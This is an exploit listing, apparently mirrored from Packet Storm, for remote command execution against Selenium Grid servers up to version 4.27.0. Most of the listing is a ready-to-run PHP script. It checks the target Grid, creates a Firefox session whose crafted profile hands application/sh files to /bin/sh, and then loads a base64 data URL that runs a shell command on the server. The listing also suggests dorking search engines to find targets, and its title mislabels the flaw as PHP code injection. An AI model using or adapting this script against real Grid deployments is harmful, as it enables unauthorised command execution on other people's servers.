Share
## https://sploitus.com/exploit?id=PACKETSTORM:215921
=============================================================================================================================================
    | # Title     : Selenium Server (Grid) versions 4.27.0 and below PHP Code Injection Vulnerability                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.selenium.dev/blog/2024/selenium-4-27-released/                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Sends a request to Selenium Grid to check if the version is vulnerable.
    
        If the target is using Firefox, it exploits firefox_profile to force the browser to run bash commands.
    
        Tries to create a new session, then sends the payload as a command to execute.
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 21
    
    [+] PayLoad :
    
    <?php
    
    function send_request($url, $method = 'GET', $data = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
            curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        }
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return json_decode($response, true);
    }
    
    $target = "http://target-ip:4444"; 
    
    $check_url = "$target/status";
    $check_response = send_request($check_url);
    
    if (isset($check_response['value']['message']) && strpos($check_response['value']['message'], 'Selenium Grid ready') !== false) {
        echo "[+] Selenium Grid detected and it is ready for exploitation!\n";
    } else {
        die("[-] Selenium Grid was not found or it is not ready.\n");
    }
    
    $malicious_profile = [
        "defaultHandlersVersion" => ["en-US" => 4],
        "mimeTypes" => [
            "application/sh" => [
                "action" => 2,
                "handlers" => [["name" => "sh", "path" => "/bin/sh"]]
            ]
        ]
    ];
    
    $encoded_profile = base64_encode(json_encode($malicious_profile));
    
    $session_data = [
        "desiredCapabilities" => [
            "browserName" => "firefox",
            "firefox_profile" => $encoded_profile
        ],
        "capabilities" => [
            "firstMatch" => [
                [
                    "browserName" => "firefox",
                    "moz:firefoxOptions" => ["profile" => $encoded_profile]
                ]
            ]
        ]
    ];
    
    $session_url = "$target/wd/hub/session";
    $session_response = send_request($session_url, 'POST', $session_data);
    
    if (!isset($session_response['value']['sessionId'])) {
        die("[-] Failed to start a new session!\n");
    }
    
    $session_id = $session_response['value']['sessionId'];
    echo "[+] Session started:: $session_id\n";
    
    $command = "whoami"; 
    $encoded_payload = base64_encode("rm -rf \$0; $command");
    
    $data_url = "data:application/sh;charset=utf-16le;base64,$encoded_payload";
    $exploit_url = "$target/wd/hub/session/$session_id/url";
    
    send_request($exploit_url, 'POST', ["url" => $data_url]);
    
    echo "[+] Payload sent! Check if the command was executed.\n";
    
    $delete_url = "$target/wd/hub/session/$session_id";
    send_request($delete_url, 'DELETE');
    
    echo "[+] Session deleted.\n";
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================